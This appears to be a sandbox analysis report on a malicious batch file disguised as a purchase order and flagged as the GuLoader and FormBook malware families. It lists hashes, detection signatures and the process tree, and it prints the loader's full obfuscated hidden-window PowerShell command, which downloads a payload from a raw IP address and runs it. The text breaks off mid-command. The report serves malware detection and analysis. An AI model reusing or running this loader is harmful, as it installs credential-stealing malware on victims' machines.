Edit tour
Windows
Analysis Report
PO_La-Tanerie04180240124.bat
Overview
General Information
| Sample name: | PO_La-Tanerie04180240124.bat |
| Analysis ID: | 1430938 |
| MD5: | dd4839ecc1b0a5b2f98415fe36f4e848 |
| SHA1: | 20389c69b3069faafc09c4adf7d98b9f36f305f9 |
| SHA256: | 7c9bff4d76e487e274fe0f7a323f55d6c74de2a809f1c646a2dbad3417c3229f |
| Infos: |   |
 | |
Detection
FormBook, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64native
cmd.exe (PID: 8088 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\PO_La -Tanerie04 180240124. bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7464 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) 
powershell.exe (PID: 3124 cmdline: powershell .exe -wind owstyle hi dden "$Rut henious = 1;$dirknin gernes='Su bstrin';$d irkningern es+='g';Fu nction Son edkkets($F umingly){$ Programmer ingsbegreb et=$Fuming ly.Length- $Rutheniou s;For($Ozo nify=1; $O zonify -lt $Programm eringsbegr ebet; $Ozo nify+=(2)) {$Hjul+=$F umingly.$d irkningern es.Invoke( $Ozonify, $Rutheniou s);}$Hjul; }function Innovative ($Oryctogn osy238){. ($Com plexes) ($ Oryctognos y238);}$Gl asskaaret= Sonedkkets ' MHoKz.i BlFlEa /U5 S. 0S A(IW .i nKdDo,w s, BN T , 1 0 .S0C;, KWIiUn 6T 4F; .x,6,4 S;, TrBv : T1I2B1S.C0 E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rR eTf orxL/. 1 2.1O. 0 ';$Beshami ng=Sonedkk ets ' UCsH eUr -MA.g. e,n.tB ';$ Bladfod=So nedkkets ' hOt t pP: a/S/,8 7,. C1T2v1L. 1 R0R5L. 1 6 O3H/.L i,c PeUn c.eJs A.,t.trf ' ;$Gruppeme dlemmernes =Sonedkket s 'S> ';$C omplexes=S onedkkets 'EiReAxB ' ;$Gambia = Sonedkket s ' e,cTh o B%Aa,pEp OdOa t,a.% S\ P,rWeSz SyCg,oVmMa It.iLc,.AB .e n, u& & .eLcDhBo. $. ';Inno vative (So nedkkets ' B$CgSlSo b BaGl :.UUn wGa r.r,a AnCt a b.i lti tDy = D(UcAm,df /IcL A$ GO a.m b imaV ) ');Innov ative (Son edkkets 'T $ g lFoDb a l.:MHKe e l.t a,p, 2 6m= $BB, l a dIfSoU d .ssfp lC i t.(V$OGU r u p,p e mBe dSlAeC m m ePrhnK e s.) ');$ Bladfod=$H eeltap26[0 ];Innovati ve (Sonedk kets ',$Tg Pl o bGaDl O:,RPr b l a,d eTs = MNTe w -AO Sb,j eUc t AS.y sSt e.m .AN e t .RWFeMbt C l i eLn t, ');Inno vative (So nedkkets ' $ RArDb.l Da.d,eHs,. .HGe.aSdCe .rLs [ $kB .ess.hKa m SiNnOgT]V= K$ GIlFaAs AsKk a.a r e t ');$F orvanskes= Sonedkkets ' RHrEbLl paUdPeTsp. AD oTwSnPl moOaSdSFCi Cl e (s$.B Ml.aDdPf o FdT,B$DHPo Co.pHoUe,s ,), ';$For vanskes=$U nwarrantab ility[1]+$ Forvanskes ;$Hoopoes= $Unwarrant ability[0] ;Innovativ e (Sonedkk ets ' $.gA lZoSb a lA :FGFrAa vR h j eN=D(M TTe,s t -S P a tFh $ AHRo o.pAo Re sS)A ') ;while (!$ Gravhje) { Innovative (Sonedkke ts 'P$ gal o bTa lL: S t uKefa rPr e s.t meFn s =S$ PtRrTuBe. ') ;Innova tive $Forv anskes;Inn ovative (S onedkkets ',S.tTa rC tD-ISDl eW e pA ,4 ') ;Innovativ e (Sonedkk ets 'B$Eg, lKo.b a,l :WGIrLa,v. hVj el=.( T ecsUtM-B PRa t h G$ LHSoSoGpco PeSs,)E ') ;Innovati ve (Sonedk kets ' $ g Dl o b.aAl D:,S.u,pRe Nr fEiHnSi .c aBlO=S$ ng,l.oFb.a .lM:RVDi t Uh aMr,d.t Fs,+ +A%.$ ,Hpe.e l t na p 2K6,. .cSoBu nCt . ') ;$Bla dfod=$Heel tap26[$Sup erfinical] ;}Innovati ve (Sonedk kets 'F$.g SlMo bAa l ,:BGFu l i xG ,=E BG ,eWt -PC o DnDt,eGnMt $UH oBoB p oPeTsU ' );Innovati ve (Sonedk kets 'E$.g LlRolb.aOl t: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP .JCUoPnCv eBr t ]M:B : FFrCoTm, B,aKsMeE6G 4IS.tSrTiF n,g.(S$FG u lRimx.)U ');Innova tive (Sone dkkets ',$ Mg lVo b,a lK: G a r ,dIe nTpBa